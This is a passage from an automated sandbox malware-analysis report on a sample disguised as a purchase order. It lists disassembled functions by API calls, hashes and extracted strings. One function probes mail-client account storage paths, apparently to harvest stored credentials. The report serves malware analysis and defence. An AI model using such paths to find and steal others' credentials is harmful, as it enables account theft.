                                                                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,37006FFD,00000000,?,?,?,37008A72,?,?,00000100), ref: 3700887B
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,37008A72,?,?,00000100,5EFC4D8B,?,?), ref: 37008901
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 370089FB
                                                                                                      • __freea.LIBCMT ref: 37008A08
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      • __freea.LIBCMT ref: 37008A11
                                                                                                      • __freea.LIBCMT ref: 37008A36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      • Opcode ID: d4e56e77879db31f47363741b6c0e09c2a9f94d2a7de4e799797955451a61004
                                                                                                      • Instruction ID: a13588f8e2f6555f324a09001a5d97137bd869dc1e5f443df121bf62fae199c3
                                                                                                      • Opcode Fuzzy Hash: d4e56e77879db31f47363741b6c0e09c2a9f94d2a7de4e799797955451a61004
                                                                                                      • Instruction Fuzzy Hash: DA51D4B2610216AFFB158E64CC84FBB37A9FB45770F1146A9F804D6180EB38EC50AE61
                                                                                                      APIs
                                                                                                      • _strlen.LIBCMT ref: 37001607
                                                                                                      • _strcat.LIBCMT ref: 3700161D
                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3700190E,?,?,00000000,?,00000000), ref: 37001643
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3700165A
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37001661
                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 37001686
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1922816806-0
                                                                                                      • Opcode ID: c4d61c973005119257c68a60c6796dac031bf39c8df9ca7ad730cda7e86fad2a
                                                                                                      • Instruction ID: c0d4ba5057925fca6a531a6c9875865e1e141590232475a6e7915e6d4b638318
                                                                                                      • Opcode Fuzzy Hash: c4d61c973005119257c68a60c6796dac031bf39c8df9ca7ad730cda7e86fad2a
                                                                                                      • Instruction Fuzzy Hash: 9F219836900204AFE7059B54DD85FEE77B8EF89730F14405AE604FB181DB78A546CBAA
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 37001038
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3700104B
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37001061
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37001075
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37001090
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 370010B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3594823470-0
                                                                                                      • Opcode ID: fc43faa5e5e0f22fd417a76eda7fc9a10019f6885068b33dbf9c3dc9f72431b3
                                                                                                      • Instruction ID: 7f060e9e42fb0e334f92dbea54be94b971c3605328fd3534567afc9ee9f808da
                                                                                                      • Opcode Fuzzy Hash: fc43faa5e5e0f22fd417a76eda7fc9a10019f6885068b33dbf9c3dc9f72431b3
                                                                                                      • Instruction Fuzzy Hash: B52191759003189BDF10DBA0DD48EDF37A8EF44234F104596E9A9E31A1DE749A86CF51
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,37003518,370023F1,37001F17), ref: 37003864
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 37003872
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3700388B
                                                                                                      • SetLastError.KERNEL32(00000000,?,37003518,370023F1,37001F17), ref: 370038DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 0b56a6809b50cfad9bda37cbe368e98597c76e5cb79a23dd28c95e0f39e4c4dd
                                                                                                      • Instruction ID: 8a929ce599eadd4866dc734fe45267a652231c0594b5406017df57a0b5401add
                                                                                                      • Opcode Fuzzy Hash: 0b56a6809b50cfad9bda37cbe368e98597c76e5cb79a23dd28c95e0f39e4c4dd
                                                                                                      • Instruction Fuzzy Hash: 5F01473A608B115EF207167D6C8AA1BEBD5FB0D678B2102FEF120E40D0EF1948028F01
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,37006C6C), ref: 37005AFA
                                                                                                      • _free.LIBCMT ref: 37005B2D
                                                                                                      • _free.LIBCMT ref: 37005B55
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,37006C6C), ref: 37005B62
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,37006C6C), ref: 37005B6E
                                                                                                      • _abort.LIBCMT ref: 37005B74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 3160817290-0
                                                                                                      • Opcode ID: 46043ae408ab440829dbbac159f25ee6c5b263b9c170b52ce07621958756c4af
                                                                                                      • Instruction ID: ee14be931661fd348e7d54c4cae06bed34fc5212ef36406ccca9d6b378a3454d
                                                                                                      • Opcode Fuzzy Hash: 46043ae408ab440829dbbac159f25ee6c5b263b9c170b52ce07621958756c4af
                                                                                                      • Instruction Fuzzy Hash: F2F068FA544A00AEF20657F86D09F1E27EA9FC5571F2601E4F928F6180FE2CA9034D76
                                                                                                      APIs
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,?,?,?,370010DF,?,?,?,00000000), ref: 37001E9A
                                                                                                        • Part of subcall function 37001E89: lstrcatW.KERNEL32(?,?,?,370010DF,?,?,?,00000000), ref: 37001EAC
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EB3
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EC8
                                                                                                        • Part of subcall function 37001E89: lstrcatW.KERNEL32(?,370010DF,?,370010DF,?,?,?,00000000), ref: 37001ED3
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3700122A
                                                                                                        • Part of subcall function 3700173A: _strlen.LIBCMT ref: 37001855
                                                                                                        • Part of subcall function 3700173A: _strlen.LIBCMT ref: 37001869
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                      • Opcode ID: a101c015a7e8d603ef3234be368804ce647c6b44591326a1b60d4d9a5ce637d2
                                                                                                      • Instruction ID: 4e9dc56d9be2a083a61200247676857b614fd6ce5dfbc7b07e46f6b0080350f7
                                                                                                      • Opcode Fuzzy Hash: a101c015a7e8d603ef3234be368804ce647c6b44591326a1b60d4d9a5ce637d2
                                                                                                      • Instruction Fuzzy Hash: BC219579A102486BE714D7A0DC91FED7339FF80724F100596F604EB1D0EAB55D818B5A
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                                                      • wsprintfW.USER32 ref: 00404A70
                                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$&B
                                                                                                      • API String ID: 3540041739-2907463167
                                                                                                      • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                                                      • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                      • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                                                                      • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":
                                                                                                      • API String ID: 589700163-165019052
                                                                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                                                                      • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                                                                      • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                      • String ID: 8
                                                                                                      • API String ID: 1453599865-4194326291
                                                                                                      • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                                                      • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37004AEA,?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000), ref: 37004B59
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37004B6C
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,37004AEA,?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082), ref: 37004B8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 4ea8a3d67a23f69daab24ceebb011941ad6f10a5221aff635b50de2493b313f3
                                                                                                      • Instruction ID: e054043e30d84ffb669f0f8786f7155a0f9bb083ceb7471815d15f4a82964503
                                                                                                      • Opcode Fuzzy Hash: 4ea8a3d67a23f69daab24ceebb011941ad6f10a5221aff635b50de2493b313f3
                                                                                                      • Instruction Fuzzy Hash: F1F03175940208BBEB119BA4CC09B9DBFF9EF05371F414198F909B6150DF349942CEA5
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1941528284-0
                                                                                                      • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                                                      • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 3700715C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3700717F
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 370071A5
                                                                                                      • _free.LIBCMT ref: 370071B8
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 370071C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: e8d34e7397f4b84aa483a95007719bd212542d0103ec6c000a6beffb42f5f938
                                                                                                      • Instruction ID: 6ab99468e70b3e5abf5d318bcc4f7d013e66f23a15a9cbf85c9812b4b4201a74
                                                                                                      • Opcode Fuzzy Hash: e8d34e7397f4b84aa483a95007719bd212542d0103ec6c000a6beffb42f5f938
                                                                                                      • Instruction Fuzzy Hash: 4C01D8B6641215BF7B120ABE5C4CDBB2AADEBC69B035101ADBD04D7380DF689C0289B1
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                                                      • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,3700636D,37005713,00000000,?,37002249,?,?,37001D66,00000000,?,?,00000000), ref: 37005B7F
                                                                                                      • _free.LIBCMT ref: 37005BB4
                                                                                                      • _free.LIBCMT ref: 37005BDB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37005BE8
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37005BF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: d9f3aae9f406ef9adb9a1a47a5859437ce6237a488401c6cb094cd7d1f916cff
                                                                                                      • Instruction ID: 2902feee5783b797f98a7dbe13d83c1bab29286b60b3f71b678687773d6ca053
                                                                                                      • Opcode Fuzzy Hash: d9f3aae9f406ef9adb9a1a47a5859437ce6237a488401c6cb094cd7d1f916cff
                                                                                                      • Instruction Fuzzy Hash: EE01F9FA144B01ABF20256F81D49F1F2AED9BC55B471200E4F929F2141EE6CA9024D65
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,370010DF,?,?,?,00000000), ref: 37001E9A
                                                                                                      • lstrcatW.KERNEL32(?,?,?,370010DF,?,?,?,00000000), ref: 37001EAC
                                                                                                      • lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EB3
                                                                                                      • lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EC8
                                                                                                      • lstrcatW.KERNEL32(?,370010DF,?,370010DF,?,?,?,00000000), ref: 37001ED3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 493641738-0
                                                                                                      • Opcode ID: 043130cfe89e12fa9bdea119c1982104896d853cb263fb7d77c689e0f6aeb465
                                                                                                      • Instruction ID: 495e4635c0b4c9b12945208998f4086f55c22c23a7bbe3aca37ef7d482c0888f
                                                                                                      • Opcode Fuzzy Hash: 043130cfe89e12fa9bdea119c1982104896d853cb263fb7d77c689e0f6aeb465
                                                                                                      • Instruction Fuzzy Hash: 5DF054361401107AE6212719AC85F7F7BBCFF85B70F440019F60CA31909B58684296B5
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 370091D0
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370091E2
                                                                                                      • _free.LIBCMT ref: 370091F4
                                                                                                      • _free.LIBCMT ref: 37009206
                                                                                                      • _free.LIBCMT ref: 37009218
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: d90697731e015edeca4d4b1817c2a611af8fdf1ba77c6726d27be154a120642f
                                                                                                      • Instruction ID: 4df4b7ad5797aa979b6458e971c147172d08a765178fc7134c919c067fab46e9
